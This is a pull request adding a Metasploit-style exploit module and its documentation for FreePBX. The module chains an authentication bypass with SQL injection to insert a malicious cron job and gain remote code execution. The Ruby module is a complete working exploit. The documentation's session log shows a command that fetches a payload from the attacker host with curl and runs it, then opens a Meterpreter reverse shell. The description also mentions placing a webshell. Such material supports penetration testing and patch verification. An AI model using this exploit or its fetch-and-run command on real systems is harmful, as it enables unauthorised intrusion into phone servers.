### PR TITLE
Adds exploit module for FreePBX (CVE-2025-66039, CVE-2025-61675)

### DIFF
--- a/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
+++ b/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
@@ -1,0 +1,70 @@
+## Vulnerable Application
+
+FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses
+that use VoIP to make and receive phone calls. Versions before 16.0.44 and 17.0.23 are vulnerable to
+multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The
+former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode
+(an option the admin can enable), it allows an attacker to authenticate as any user. The latter
+CVE describes multiple SQL injections; this module exploits the SQL injection in the custom
+extension component. The module chains these vulnerabilities into an unauthenticated SQL injection
+attack and gains remote code execution by injecting an SQL record into the cron_jobs table.
+The cron_jobs database contains cron tasks that FreePBX executes in the context of the operating system.
+
+To setup the environment, perform minimal installation from [here](https://downloads.freepbxdistro.org/ISO/SNG7-PBX16-64bit-2302-1.iso). Note that **Authorization Type** needs to be set to **webserver**:
+
+1. Login into FreePBX Administration
+1. Settings -> Advanced Settings
+1. Change **Authorization Type** to **webserver**
+
+## Verification Steps
+
+1. Install FreePBX
+1. Start msfconsole
+1. Do: `use exploit/unix/http/freepbx_custom_extension_rce`
+1. Do: `set RHOSTS [target IP address]`
+1. Do: `set USERNAME [FreePBX user]`
+1. Do: `set LHOST [attacker IP]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### USERNAME
+
+Performing authentication bypass requires the username of an existing user.
+This username is used in the Authorization header along with a random password.
+
+
+## Scenarios
+
+```
+msf exploit(unix/http/freepbx_custom_extension_rce) > set rhosts 192.168.168.223
+rhosts => 192.168.168.223
+smsf exploit(unix/http/freepbx_custom_extension_rce) > set lhost ens39
+lhost => ens39
+msf exploit(unix/http/freepbx_custom_extension_rce) > set lport 4477
+lport => 4477
+msf exploit(unix/http/freepbx_custom_extension_rce) > run verbose=true 
+[*] Command to run on remote host: curl -so ./anYbkMUNb http://192.168.168.128:8080/_OToTDMfcK8wHNiGY3kcWw;chmod +x ./anYbkMUNb;./anYbkMUNb&
+[*] Fetch handler listening on 192.168.168.128:8080
+[*] HTTP server started
+[*] Adding resource /_OToTDMfcK8wHNiGY3kcWw
+[*] Started reverse TCP handler on 192.168.168.128:4477 
+[+] Created cronjob with job name: 'yRJu'
+[*] Waiting for cronjob to trigger...
+[*] Client 192.168.168.223 requested /_OToTDMfcK8wHNiGY3kcWw
+[*] Sending payload to 192.168.168.223 (curl/7.29.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 192.168.168.223
+[*] Meterpreter session 1 opened (192.168.168.128:4477 -> 192.168.168.223:53254) at 2026-01-06 15:14:05 +0100
+[*] Attempting to perform cleanup
+[+] Cronjob removed, happy hacking!
+
+meterpreter > sysinfo 
+Computer     : freepbx.sangoma.local
+OS           : Red Hat 7.8.2003 (Linux 3.10.0-1127.19.1.el7.x86_64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+

--- a/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
+++ b/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
@@ -1,14 +1,13 @@
 ## Vulnerable Application
 
-FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses
-that use VoIP to make and receive phone calls. Versions before 16.0.44 and 17.0.23 are vulnerable to
-multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The
-former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode
-(an option the admin can enable), it allows an attacker to authenticate as any user. The latter
-CVE describes multiple SQL injections; this module exploits the SQL injection in the custom
-extension component. The module chains these vulnerabilities into an unauthenticated SQL injection
-attack and gains remote code execution by injecting an SQL record into the cron_jobs table.
-The cron_jobs database contains cron tasks that FreePBX executes in the context of the operating system.
+FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use
+VoIP to make and receive phone calls. Versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039,
+while versions before 16.0.92 and 17.0.6 are vulnerable to CVE-2025-61675. The former represents an
+authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it
+allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module
+exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an
+unauthenticated SQL injection attack and gains remote code execution by injecting an SQL record into the
+cron_jobs table. The cron_jobs database contains cron tasks that FreePBX executes in the context of the operating system
 
 To setup the environment, perform minimal installation from [here](https://downloads.freepbxdistro.org/ISO/SNG7-PBX16-64bit-2302-1.iso).
 Note that **Authorization Type** needs to be set to **webserver**:

--- a/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
+++ b/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
@@ -71,5 +71,7 @@ OS           : Red Hat 7.8.2003 (Linux 3.10.0-1127.19.1.el7.x86_64)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: asterisk
 ```
 

--- a/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
+++ b/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
@@ -10,11 +10,18 @@ extension component. The module chains these vulnerabilities into an unauthentic
 attack and gains remote code execution by injecting an SQL record into the cron_jobs table.
 The cron_jobs database contains cron tasks that FreePBX executes in the context of the operating system.
 
-To setup the environment, perform minimal installation from [here](https://downloads.freepbxdistro.org/ISO/SNG7-PBX16-64bit-2302-1.iso). Note that **Authorization Type** needs to be set to **webserver**:
+To setup the environment, perform minimal installation from [here](https://downloads.freepbxdistro.org/ISO/SNG7-PBX16-64bit-2302-1.iso).
+Note that **Authorization Type** needs to be set to **webserver**:
 
 1. Login into FreePBX Administration
 1. Settings -> Advanced Settings
 1. Change **Authorization Type** to **webserver**
+
+Finally, the FreePBX needs to be activated to access vulnerable APIs:
+
+1. Log into FreePBX Administraton
+1. Admin -> System Admin
+1. Activate instance
 
 ## Verification Steps
 

--- a/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
+++ b/documentation/modules/exploit/unix/http/freepbx_custom_extension_rce.md
@@ -32,8 +32,6 @@ To setup the environment, perform minimal installation from [here](https://downl
 ### USERNAME
 
 Performing authentication bypass requires the username of an existing user.
-This username is used in the Authorization header along with a random password.
-
 
 ## Scenarios
 

--- a/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
+++ b/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
@@ -1,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'FreePBX endpoint SQLi to RCE',
+        'Description' => %q{
+          FreePBX versions before 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack and gains remote code execution by injecting an SQL record into the cron_jobs table. The cron_jobs database contains cron tasks that FreePBX executes in the context of the operating system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Noah King', # research
+          'msutovsky-r7', # module
+        ],
+        'References' => [
+          [ 'CVE', '2025-66039'], # Authentication Bypass
+          [ 'CVE', '2025-61675'], # SQL injections
+          [ 'URL', 'https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/']
+        ],
+        'Platform' => ['linux'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'DefaultOptions' =>
+              {
+                'Payload' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+                'WfsDelay' => 70 # cronjob may take up to a minute to start
+              }
+            }
+          ]
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '2025-12-11',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']),
+      ]
+    )
+  end
+
+  def sqli_custom_extension(payload)
+    send_request_cgi({
+      'uri' => normalize_uri('admin', 'config.php'),
+      'method' => 'POST',
+      'headers' => {
+        'Authorization' => basic_auth(datastore['USERNAME'], Rex::Text.rand_text_alphanumeric(6))
+      },
+      'vars_get' => {
+        'display' => 'endpoint',
+        'view' => 'customExt'
+      },
+      'vars_post' => {
+        'id' => payload
+      }
+    })
+  end
+
+  def check
+    res = sqli_custom_extension(%('))
+    if res&.code == 500 && res.body =~ /You have an error in your SQL syntax/
+      return Exploit::CheckCode::Vulnerable('Detected SQL injection with authentication bypass')
+    end
+
+    Exploit::CheckCode::Safe('No SQL injection detected, target is patched')
+  end
+
+  def exploit
+    @job_name = Rex::Text.rand_text_alpha(4..7)
+
+    rce_payload = 'INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)'
+    rce_payload << " VALUES ('sysadmin','#{@job_name}','#{payload.encoded}',NULL,'* * * * *',30,1,1)"
+
+    res = sqli_custom_extension(%(1';#{rce_payload} -- ))
+
+    if res&.code == 401
+      print_good("Created cronjob with job name: '#{@job_name}'")
+      print_status('Waiting for cronjob to trigger...')
+    else
+      fail_with(Failure::PayloadFailed, 'Cronjob was not created.')
+    end
+  end
+
+  def cleanup
+    super
+
+    return unless @job_name
+
+    # Remove the created cronjob
+    res = sqli_custom_extension(%('; DELETE FROM cron_jobs WHERE jobname='#{@job_name}' -- ))
+
+    print_status('Attempting to perform cleanup')
+
+    if res&.code == 401
+      print_good('Cronjob removed, happy hacking!')
+    else
+      print_bad('Cronjob not removed, please perform manual cleanup!')
+    end
+  end
+end

--- a/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
+++ b/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
@@ -14,7 +14,15 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'FreePBX endpoint SQLi to RCE',
         'Description' => %q{
-          FreePBX versions before 16.0.44 and 17.0.23 are vulnerable to multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61675, in the context of this module. The former represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack and gains remote code execution by injecting an SQL record into the cron_jobs table. The cron_jobs database contains cron tasks that FreePBX executes in the context of the operating system.
+          FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses that use
+          VoIP to make and receive phone calls. Versions before 16.0.44 and 17.0.23 are vulnerable to CVE-2025-66039,
+          while versions before 16.0.92 and 17.0.6 are vulnerable to CVE-2025-61675. The former represents an
+          authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it
+          allows an attacker to authenticate as any user. The latter CVE describes multiple SQL injections; this module
+          exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an
+          unauthenticated SQL injection attack and gains remote code execution by injecting an SQL record into th
+          cron_jobs table. The cron_jobs database contains cron tasks that FreePBX executes in the context of the
+          operating system.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
+++ b/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('USERNAME', [true, 'A valid FreePBX user', 'admin']),
+        OptString.new('USERNAME', [true, 'A valid FreePBX user']),
       ]
     )
   end

--- a/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
+++ b/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     res = sqli_custom_extension(%('))
-    if res&.code == 500 && res.body =~ /You have an error in your SQL syntax/
+    if res&.code == 500
       return Exploit::CheckCode::Vulnerable('Detected SQL injection with authentication bypass')
     end
 
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status('Attempting to perform cleanup')
 
     if res&.code == 401
-      print_good('Cronjob removed, happy hacking!')
+      print_good('Cronjob removed.')
     else
       print_bad('Cronjob not removed, please perform manual cleanup!')
     end

--- a/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
+++ b/modules/exploits/unix/http/freepbx_custom_extension_rce.rb
@@ -85,10 +85,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    @job_name = Rex::Text.rand_text_alpha(4..7)
+    @job_name = Rex::Text.rand_text_alpha(8..12)
 
     rce_payload = 'INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order)'
-    rce_payload << " VALUES ('sysadmin','#{@job_name}','#{payload.encoded}',NULL,'* * * * *',30,1,1)"
+    rce_payload += " VALUES ('sysadmin','#{@job_name}','#{payload.encoded}',NULL,'* * * * *',30,1,1)"
 
     res = sqli_custom_extension(%(1';#{rce_payload} -- ))
 
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res&.code == 401
       print_good('Cronjob removed.')
     else
-      print_bad('Cronjob not removed, please perform manual cleanup!')
+      print_bad("Cronjob #{@job_name} not removed, please perform manual cleanup!")
     end
   end
 end


### PR DESCRIPTION
~~This PR adds modules for multiple CVEs (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039). This PR works as placeholder for now as modules are not finished, but contain the basic exploitation logic. All modules use authentication bypass (CVE-2025-66039). The CVE-2025-61675 describes multiple SQL injections, but the SQLi modules uses only one variant (one for user insertion, the other one for RCE).~~

~~**WORK IN PROGRESS, TREAT AS SUCH**~~

The CVE-2025-66039 represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user. 

The CVE-2025-61675 describes multiple SQL injections; the modules exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.

The CVE-2025-61678 allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server’s directory.

To setup the environment, perform minimal installation from [here](https://downloads.freepbxdistro.org/ISO/SNG7-PBX16-64bit-2302-1.iso). Note that **Authorization Type** needs to be set to **webserver**:

1. Login into FreePBX Administration
1. Settings -> Advanced Settings
1. Change **Authorization Type** to **webserver**

